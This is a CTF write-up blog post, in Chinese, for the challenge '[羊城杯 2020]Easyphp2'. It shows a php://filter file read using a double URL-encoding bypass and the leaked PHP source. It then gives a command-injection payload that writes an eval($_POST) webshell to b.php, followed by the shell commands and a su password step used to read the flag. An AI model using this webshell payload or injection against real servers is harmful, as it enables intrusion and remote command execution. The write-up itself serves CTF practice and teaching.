[羊城杯 2020]Easyphp21

于 2024-09-06 20:44:14 发布
阅读量993 收藏 5
点赞数 21
分类专栏: CTF 文章标签: linux python php ctf web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/alwtj/article/details/141968174
版权

知识点:php伪协议

               webshell利用

               url编码绕过

               Linux命令执行

 一眼文件包含,先用php伪协议去读取一下GWHT的内容.

http://3e60668c-22a1-46d8-8427-54bb94c616c5.node5.buuoj.cn:81/?file=php://filter/convert.base64-encode/resource=GWHT.php

看来是有过滤,那么用两次url编码就可以绕过了.

Python_url编码脚本:

url = input("Enter a url: ")
encoded_url = ""
for i in url:
    encoded_url += '%' + hex(ord(i))[2:].zfill(2)
print(encoded_url)

payload:

http://3e60668c-22a1-46d8-8427-54bb94c616c5.node5.buuoj.cn:81/?file=php://filter/%25%36%33%25%36%66%25%36%65%25%37%36%25%36%35%25%37%32%25%37%34%25%32%65%25%36%32%25%36%31%25%37%33%25%36%35%25%33%36%25%33%34%25%32%64%25%36%35%25%36%65%25%36%33%25%36%66%25%36%34%25%36%35/resource=GWHT.php

 

PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQoNCjxoZWFkPg0KICAgIDxtZXRhIGNoYXJzZXQ9IlVURi04Ij4NCiAgICA8bWV0YSBuYW1lPSJ2aWV3cG9ydCIgY29udGVudD0id2lkdGg9ZGV2aWNlLXdpZHRoLCBpbml0aWFsLXNjYWxlPTEuMCI+DQogICAgPG1ldGEgaHR0cC1lcXVpdj0iWC1VQS1Db21wYXRpYmxlIiBjb250ZW50PSJpZT1lZGdlIj4NCiAgICA8dGl0bGU+Y291bnQgaXMgaGVyZTwvdGl0bGU+DQoNCiAgICA8c3R5bGU+DQoNCiAgICAgICAgaHRtbCwNCiAgICAgICAgYm9keSB7DQogICAgICAgICAgICBvdmVyZmxvdzogbm9uZTsNCiAgICAgICAgICAgIG1heC1oZWlnaHQ6IDEwMHZoOw0KICAgICAgICB9DQoNCiAgICA8L3N0eWxlPg0KPC9oZWFkPg0KDQo8Ym9keSBzdHlsZT0iaGVpZ2h0OiAxMDB2aDsgdGV4dC1hbGlnbjogY2VudGVyOyBiYWNrZ3JvdW5kLWNvbG9yOiBncmVlbjsgY29sb3I6IGJsdWU7IGRpc3BsYXk6IGZsZXg7IGZsZXgtZGlyZWN0aW9uOiBjb2x1bW47IGp1c3RpZnktY29udGVudDogY2VudGVyOyI+DQoNCjxjZW50ZXI+PGltZyBzcmM9InF1ZXN0aW9uLmpwZyIgaGVpZ2h0PSIyMDAiIHdpZHRoPSIyMDAiIC8+IDwvY2VudGVyPg0KDQogICAgPD9waHANCiAgICBpbmlfc2V0KCdtYXhfZXhlY3V0aW9uX3RpbWUnLCA1KTsNCg0KICAgIGlmICgkX0NPT0tJRVsncGFzcyddICE9PSBnZXRlbnYoJ1BBU1MnKSkgew0KICAgICAgICBzZXRjb29raWUoJ3Bhc3MnLCAnUEFTUycpOw0KICAgICAgICBkaWUoJzxoMj4nLic8aGFja2VyPicuJzxoMj4nLic8YnI+Jy4nPGgxPicuJzQwNCcuJzxoMT4nLic8YnI+Jy4nU29ycnksIG9ubHkgcGVvcGxlIGZyb20gR1dIVCBhcmUgYWxsb3dlZCB0byBhY2Nlc3MgdGhpcyB3ZWJzaXRlLicuJzIzMzMzJyk7DQogICAgfQ0KICAgID8+DQoNCiAgICA8aDE+QSBDb3VudGVyIGlzIGhlcmUsIGJ1dCBpdCBoYXMgc29tZXRpbmcgd3Jvbmc8L2gxPg0KDQogICAgPGZvcm0+DQogICAgICAgIDxpbnB1dCB0eXBlPSJoaWRkZW4iIHZhbHVlPSJHV0hULnBocCIgbmFtZT0iZmlsZSI+DQogICAgICAgIDx0ZXh0YXJlYSBzdHlsZT0iYm9yZGVyLXJhZGl1czogMXJlbTsiIHR5cGU9InRleHQiIG5hbWU9ImNvdW50IiByb3dzPTEwIGNvbHM9NTA+PC90ZXh0YXJlYT48YnIgLz4NCiAgICAgICAgPGlucHV0IHR5cGU9InN1Ym1pdCI+DQogICAgPC9mb3JtPg0KDQogICAgPD9waHANCiAgICBpZiAoaXNzZXQoJF9HRVRbImNvdW50Il0pKSB7DQogICAgICAgICRjb3VudCA9ICRfR0VUWyJjb3VudCJdOw0KICAgICAgICBpZihwcmVnX21hdGNoKCcvO3xiYXNlNjR8cm90MTN8YmFzZTMyfGJhc2UxNnw8XD9waHB8Iy9pJywgJGNvdW50KSl7DQogICAgICAgIAlkaWUoJ2hhY2tlciEnKTsNCiAgICAgICAgfQ0KICAgICAgICBlY2hvICI8aDI+VGhlIENvdW50IGlzOiAiIC4gZXhlYygncHJpbnRmIFwnJyAuICRjb3VudCAuICdcJyB8IHdjIC1jJykgLiAiPC9oMj4iOw0KICAgIH0NCiAgICA/Pg0KDQo8L2JvZHk+DQoNCjwvaHRtbD4=

进行base64解码:

<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>count is here</title>

    <style>

        html,
        body {
            overflow: none;
            max-height: 100vh;
        }

    </style>
</head>

<body style="height: 100vh; text-align: center; background-color: green; color: blue; display: flex; flex-direction: column; justify-content: center;">

<center><img src="question.jpg" height="200" width="200" /> </center>

    <?php
    ini_set('max_execution_time', 5);

    if ($_COOKIE['pass'] !== getenv('PASS')) {
        setcookie('pass', 'PASS');
        die('<h2>'.'<hacker>'.'<h2>'.'<br>'.'<h1>'.'404'.'<h1>'.'<br>'.'Sorry, only people from GWHT are allowed to access this website.'.'23333');
    }
    ?>

    <h1>A Counter is here, but it has someting wrong</h1>

    <form>
        <input type="hidden" value="GWHT.php" name="file">
        <textarea style="border-radius: 1rem;" type="text" name="count" rows=10 cols=50></textarea><br />
        <input type="submit">
    </form>

    <?php
    if (isset($_GET["count"])) {
        $count = $_GET["count"];
        if(preg_match('/;|base64|rot13|base32|base16|<\?php|#/i', $count)){
        	die('hacker!');
        }
        echo "<h2>The Count is: " . exec('printf \'' . $count . '\' | wc -c') . "</h2>";
    }
    ?>

</body>

</html>

一共有两处代码 :

 <?php
    ini_set('max_execution_time', 5);

    if ($_COOKIE['pass'] !== getenv('PASS')) {
        setcookie('pass', 'PASS');
        die('<h2>'.'<hacker>'.'<h2>'.'<br>'.'<h1>'.'404'.'<h1>'.'<br>'.'Sorry, only people from GWHT are allowed to access this website.'.'23333');
    }
    ?>

这个代码就是让你的cookie里的pass要等于GWHT.

第二处代码:

 <?php
    if (isset($_GET["count"])) {
        $count = $_GET["count"];
        if(preg_match('/;|base64|rot13|base32|base16|<\?php|#/i', $count)){
        	die('hacker!');
        }
        echo "<h2>The Count is: " . exec('printf \'' . $count . '\' | wc -c') . "</h2>";
    }
    ?>

这里呢是要我们绕过一个正则匹配,同时要通过下面的exec函数去获取flag值.

那么开始解题吧.

将这里的pass值改为GWHT.

开始第二关:

我们可以通过写shell木马的方式去控制他的电脑.

由于呢正则表达式过滤了php,所以我们可以用<?=?>来代替.

同时开始构造payload

/?file=GWHT.php&count='|echo%20"<?=%20eval(\$_POST['cmd'])?>"%20|tee%20b.php|'

那么反应到服务器的效果呢就是

exec('printf \'' . '|echo "<?= eval(\$_POST['cmd'])?>" |tee b.php|' . '\' | wc -c')

 

之后链接蚁剑.

(www-data:/var/www/html) $ ls /

GWHT

bin

boot

dev

etc

home

lib

lib64

media

mnt

opt

proc

root

run

sbin

srv

sys

tmp

usr

var

(www-data:/var/www/html) $ find /GWHT -name *flag*

/GWHT/system/of/a/down/flag.txt

(www-data:/var/www/html) $ cat /GWHT/system/of/a/down/flag.txt

cat: /GWHT/system/of/a/down/flag.txt: Permission denied

(www-data:/var/www/html) $ ls -l /GWHT/system/of/a/down/flag.txt

-r--r----- 1 root GWHT 43 Sep  6 12:05 /GWHT/system/of/a/down/flag.txt

可以看出来没有权限.

 

(www-data:/var/www/html) $ ls /GWHT

README

avenged

dream

findaas

led

system

(www-data:/var/www/html) $ cat /GWHT/README

My password hash is 877862561ba0162ce610dd8bf90868ad414f0ec6.

这里有一个README文件那就读一下发现是GWHT账户加密过的密码.

去解码一下.

MD5解码

 

解出来是GWHTCTF 

于是我们开始读取flag.txt

echo "GWHTCTF"| su - GWHT -c 'cat /GWHT/system/of/a/down/flag.txt'

游戏解释. 

 

 

 

 

 

安红豆.
关注
  • 21
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF[羊城2020]easyphp
snowlyzz的博客
08-21 777
刷题记录
[羊城2020]easyphp --- 伪协议的使用时机,---python上传.htaccess的利用 -- preg_match绕过
Zero_Adam的博客
05-18 960
目录:一. 自己做:二、学到的。不足:三、1. 利用.htaccess来设置文件自动包含2. 绕过 \n 的过滤3. 绕过stristr的过滤。4. 绕过preg_match 好像 原题的话,是由声明的,所以我的本地才不行。 本题环境只对index.php文件进行解析。并且开头和末尾都对当前目录下的文件进行检查,删除(unlink)除了index.php外的所有文件 一. 自己做: 源码: <?php $files = scandir('./'); foreach($files a
Easy2PHP v1.0.0(apache2+mysql6+php5)
11-02
程序采用目前最新版本的AMP+Z(即Apache,MySQL,PHP,Zend)# 版本如果您的计算机已经安装了IIS或者MySQL,请先停止掉IIS和MySQL的服务再运行。1, 运行'All_Start.cmd'文件,在浏览器内访问站点http8080/ 。2, 如不需要MySQL服务,则运行'Apache_Start.cmd'即可。3,'All_Stop.cmd'文件为停止所有服务,包括Apache,MySQL。4,虚拟主机的主目录为'website',只要将您的网站程序放到该目录下,默认的站点地址为http8080/,如要访问website目录下的test.php,则在浏览器中输入http8080/test.php即可访问。
[羊城 2020]Easyphp2
paidx0
08-23 420
[羊城 2020]Easyphp2
BUUCTF--[羊城 2020]Easyphp2
qq_46263951的博客
08-18 1326
进入后的页面 根据题目提示我们可以知道这是一道PHP代码审计的题 所以使用伪协议查看源代码,这里使用的是两次url编码绕过 /?file=php://filter/read=convert.quoted-printable-encode/resource=GWHT.php /?file=php://filter/read=convert.%2562%2561%2573%2565%2536%2534-encode/resource=GWHT.php <!DOCTYPE html> &lt
羊城2020 Easyphp2
qq_53755216的博客
06-24 1178
随便刷一刷 随便总结一下 随便涨点姿势 二话不说先目录扫描 但是扫出来一堆429.。。。 看了一下dirsearch的readme 发现了以下参数 -s DELAY, --delay=DELAY Delay between requests emmm 真不错 重新来! 还是429 .。。。发现线程是30 .。。。 -t THREADS, --threads=THREADS Number of threads
2020YCBCTF:2020羊城官方writeup及
03-24
20202020羊城官方writeup及源码 各个过渡的分散的writeup后续会逐步上传,所有转移的writeup已经汇总在wp文件夹下的writeup文件里面了!
2020YCBCTF羊城官方Writeup.pdf
10-28
标题《2020YCBCTF羊城官方Writeup.pdf》中的“YCBCTF”指的是一种名为“羊城”的网络安全竞赛(CTF),这是一个以网络安全为主题的竞赛,CTF全称Capture The Flag,即“夺旗赛”,是一种信息安全竞赛活动。...
EasyPHP
07-22
资源名称:EasyPHP工具简介:EasyPHP帮助你使用PHP管理数据、开发站点和应用程序。它是调试PHP程序的好东西,集成: Apache , PHP , MySQL , Zend , PhpMyAdmin 为一体的web环境套件相关图片: 资源太大,传百度网盘了...
easy2php环境工具
03-03
快速部署PHP环境,便于开发和调试。批量处理,十分方便
Easy2PHP5 build 2 php本地电脑环境
03-08
什么是Easy2PHP? Easy2PHP是Windows下的Apache + PHP + MySQL + Zend + phpMyAdmin 的绿色环境套件,免安装,几秒钟即可搭建Web服务器。 *************************************** 如何使用Easy2PHP? 1,先点击下载Easy2PHP解压包,解压到任意目录(不要含中文路径)。 2,运行目录内的Exec2PHP.exe执行文件,在电脑桌面右下方(系统托盘)处可看到该程序图标。 3, 鼠标左键单击该程序图标,将会出现菜单选项。 - 启动Apache,仅启动Apache服务,重启,停止略,启动MySQL,仅启动MySQL服务。 - 全部启动则启动Apahce跟MySQL两个服务,全部停止略。 - 访问phpMyAdmin,是访问website目录内的phpMyAdmin程序。 - 访问首页是访问website目录内的index.php文件 - 打开服务,是为了方便查看Apache跟MySQL服务是否启动。 - 退出,仅退出Exec2PHP程序。 注意:MySQL的端口是默认的配置(3306),如果你的电脑之前已经安装了MySQL,并已经启动了该服务, 请先将该MySQL服务停止后再运行Easy2PHP,确保程序使用的稳定。 4,虚拟主机的主目录为'website',只要将您的网站程序放到该目录下, 默认的站点地址为http://localhost:8080/,如要访问website目录下的test.php, 则在浏览器中输入http://localhost:8080/test.php即可访问。 5, 登录phpMyAdmin的帐号root,密码123456。 ***************************************
Easy2PHP5 Build 2 (apache2+mysql5+php5)
11-02
Easy2PHP是Windows下的Apache + PHP + MySQL + Zend + phpMyAdmin 的绿色环境套件,免安装,几秒钟即可搭建Web服务器。 当前版本包含: Apache 2.2.6 PHP 5.2.6 MySQL 5.0.45 Zend Optimizer 3.3.0 phpMyAdmin 2.11.2
BUUCTF[web][p6][[羊城 2020]Easyphp2]
qq_29060627的博客
05-06 1111
第1步,开局: http://url/?file=GWHT.php 第2步:使用dirsearch-master扫描网站:得robots.txt 内容为: Disallow: /?file=check.php 看样子是文件包含: 第3步,编码访问得源码[ GWHT.php check.php index.php ] ,index.php无法继续包含: http://url/?file=php://filter/convert.%25%36%32ase64-encode/resourc
[羊城 2020]Easyphp2 WP
wmicn的博客
09-15 1968
[羊城 2020]Easyphp2 进入题目,观察到两个点 1.是url中get的file参数 2.是题目要求 only people from GWHT are allowed to access this website 考虑先使用php伪协议读源码 ?file=php://filter/convert.base64-encode/resource=index.php 测试发现是base64被过滤了,但是quoted-printable-encode并没有被过滤 ?file=php://filt
[羊城2020]easyphp
nigo134的博客
06-15 563
1. .htaccess的利用.htaccess利用方式 .htaccess相关问题2.php://filter的利用关于php://filter在file_put_contents中的利用_bfengj的博客-CSDN博客 核心代码: filename只能由点和字母组成,content不能有flag和file。乍一看挺简单的filename传a.php,content传再用蚁剑访问就行了。但事实是想多了,确实能够将木马写入a.php,也可以访问a.php,但......
深入解析[羊城 2020]Easyphp2
最新发布
qq_49849300的博客
03-07 495
0.遇到回显:Sorry, only people from GWHT are allowed to access this website.23333。b.打开蚁剑命令行 find / -name flag*7.直接切换用户不行,因为蚁剑shell不是完整tty。所以用 find /GWHT -name flag*a.如何将简单的Shell转换成为完全交互式的TTY。3.直接命令执行看不到flag,命令执行写马。直接读flag.txt是不行的,没有权限。先放官方wp,写的比较简易。6.手动翻找其他线索。
[羊城 2020]Easyphp2&&[羊城 2020]Blackcat
2202_75361164的博客
12-04 182
[羊城 2020]Easyphp2&&[羊城 2020]Blackcat
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值